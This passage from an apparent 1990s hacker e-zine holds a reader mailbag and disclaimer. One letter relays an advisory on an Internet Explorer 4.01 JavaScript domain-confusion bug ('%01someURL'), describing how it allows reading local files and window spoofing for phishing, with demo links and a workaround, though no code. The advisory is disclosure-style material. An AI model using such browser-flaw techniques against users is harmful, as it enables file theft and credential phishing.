newbies out there a decent clue as to what is going on. Plugs: My mate zomba's site. Glasgow Mad Squad site. Cr0w and Reines UFO Site. Please support the blue ribbon campaign all! -- -darkflame -darkflame@zetnet.co.uk -http://welcome.to/digital.insanity "The roots of education are bitter, but the fruit is sweet" :..::..End Of File..::..: :..::.File 12 Of 13.::..: :.::.You've Got Mail.::.: :.::.:..By Readers.:.::.: __ __ / \ / \ | \ / | \ | / _ \ / ___ | | ___ \ / / _ \ /\ /\ \| /\ /\ / \ | | | / \ | | | | | | | | - | | | || || | | | | | | __/ | | | \_/ | | \ | \ / | \ \_/ \___/ \____| \_/ \___/ . . . . . /\. . . . . . ___. ___ . | |_ . . . . . ./ \ ./ _ \ | \ . . . . . . . | _ | | / \ |.| _/ . . . . . . . .| (_) |.||. ||.| |_. . . . . . . . . . . . | |.| \_/ |.| \ . . . . . . . . . . . . .\__ | .\___/. .\___/. . . . , , /\, , , /\, / |, , , , , , , , , , , , , * | \, * / | *\___/* ,_* ,_* , * , * , * , * , | \* / |* , * , *( ),\ |, * , * , * , * * * *| \/ | * ____* _ | | * * * * * * * # # | |\ /| |# / \#\ |#| |# # # # # # # # #,#,#| |,\/,| |,| _ |,| |,| |,#,#,#,#,#,#,#, #*#*#| |#*#*| |*| |*| |*| |_#*#*#*#*#*#*#* #### |_\### |_\# \____\ |_\##\__\############# #@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ @@@@@#@@@@@#@@@@@#@@@@@#@@@@@#@@@@@#@@@@@#@@@@ <*> Another month goes by, another shitload of e-mails pour in. E-mail us an intelligent, correctly spelled mail and we promise no more sarcastic reaponses :). Did you notice the massive ascii art logo greeting you as you opened this text file? Our heart felt thanks goes out to our old buddy GPF#2 who designed it in his spare time. Moving right along, here is this months mailbag. The e-mails are arranged in the order of the date they were received. :..This Is A Mans World.: From: "Jerry Stevens" To: under_p@yahoo.com Subject: up mag helo MAN! i just read all of up. good one. what do i have to do to to be put in the shout outs section. make me a shout out plz. jerry (-the-man-) <*> <*> <*> <*> <*> <*> Sorry to tell you that the Shout Outs To section, renamed Greetings To, is reserved for friends of staff members and/or people who have helped out this magazine in the past. That includes people who have recently submitted articles or agreed to be a second host. I don't think you'd fit in well due to your repeated use of the word "man". People should not be judged on terms of their gender. We are targeting women just as much as men even though they are seen as a minority in the underground. :...Java Security Hole..: From: darkflame To: zengus@yahoo.com Subject: -UP- text file. As a possible future writer for -UP- I thought I would elaborate for the benefit of everyone on a Java security hole recently posted to comp.security.misc. Java Script Security Hole adapted from a post found on comp.security.misc by guninski@hotmail.com It has recently been noticed that there is a Javascript security bug in Internet Explorer 4.01. This has subsequently been patched. This opens up several security holes. The bug is: if '%01someURL' is added after the URL, Microsoft Internet Explorer interprets this that the document is loaded from the domain of 'someURL'. Some possible security flaws this could effect are: 1) Microsoft Internet Explorer allows reading local files and sending them to an arbitrary server. The filename, however, must be known to the intruder. According to Guninski The bug may be exploited using HTML mail message. The Demo is available at: http://www.geocities.com/ResearchTriangle/1711/read3.html This works on IE 4.0 also. 2) Microsoft Internet Explorer allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location has now become a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browsing a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card numbers. The bug may be exploited using HTML mail message. Demo is available at: http://www.geocities.com/ResearchTriangle/1711/read4.html Workaround: Disable Javascript All credit goes to the origonal poster. -- -darkflame -darkflame@zetnet.co.uk -http://welcome.to/digital.insanity "The roots of education are bitter, but the fruit is sweet" <*> <*> <*> <*> <*> <*> Thanks for the input. As you can all see Darkflame has joined the team to become a permanent writer here. He will surely write us many good articles when he's not plugging education :P. :.::..Great Mag Guys.::.: From: sweetphreak@postmaster.co.uk To: under_p@yahoo.com Subject: Subscribe Subscribe me to Underground Periodocal, thanks. It's a great mag. -SweetPhreak <*> <*> <*> <*> <*> <*> We aim to please. We've put you on the subscriber list. Also, as you might have seen in the Introduction people can subscribe by sending an e-mail message to underground-periodical-subscribe@egroups.com. :.::..Viable Project.::.: From: Kamal To: zengus@yahoo.com Subject: Re: h\p e-zine How is work on your zine coming ? Is it still a viable project and do you still need writers ? Let me know, I know some parties who might be interested in contributing. "Knowledge is better than riches, for -- http://www.mpowernet.com knowledge guards you while you guard -- kamals@mpowernet.com riches... Riches diminish with spending -- webspinner@mpowernet.com but knowledge increases with it." -- (5 1 3) 3 8 1 - S U R F -'Ali Ibn Abi Talib --http://oz.uc.edu/~southakj/ "He who controls the present controls the past." -Abu Hamid al-Ghazzali "He who controls the past controls the future." -Orwell, 1984 "A paranoid person is one who is well informed." -Dead Addict "Governments have killed more people than murderers!" -Phil Zimmermann "In God we trust, all others we monitor" -Steve Uhrig, SWS Security "Give alms to anybody you like and become his master, beg from anybody you wish and become his captive, and you may remain self-dependent if you like so that you may be an equal to others." -'Ali Ibn Abi Talib "That which is hidden and secret will eventually be revealed. A secret, once lost, is gone forever and cannot be regained. Security through secrecy is largely a myth." -Michael H. Warfield, Linux World Magazine ----------------------------- <*> <*> <*> <*> <*> <*> This is a reply to a newsgroup message that was posted months ago. We replied to Kamal personally with the URL and told him that we would greatly appreciate if any interested parties contributed. Although we need no more official or permanent writers we rely heavily on independent contributions as always. We liked the quotes as well. :..::..End Of File..::..: :..::.File 13 Of 13.::..: :..Disclaimer & The End.: :.::.:.By Up Staff.:.::.: <*> Use this information at your own risk. Staff or contributors to Up, nor the persons providing this e-zine, will NOT assume ANY responsibility for the use, misuse, or abuse, of the information provided herein. The previous information is provided for educational purposes ONLY. The information is NOT to be used for illegal purposes. By reading this e-zine you ARE AGREEING to the following terms: I understand that using this information is illegal. I agree to, and understand, that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Up staff, contributors, or anyone that provided this e-zine. I understand that this information is for educational purposes only. Thanks for reading. ________ __ __ ______ ______ ___ __ ____ |__ __| | | | | | ___| | ___| | \ | | | _ \ | | | |_| | | |__ | |__ | \ | | | | | \ | | | _ | | __| | __| | |\ \| | | | | | | | | | | | | |___ | |___ | | \ | | |_| / |__| |__| |__| |______| |______| |__| \___| |____/ :..::..End Of File..::..: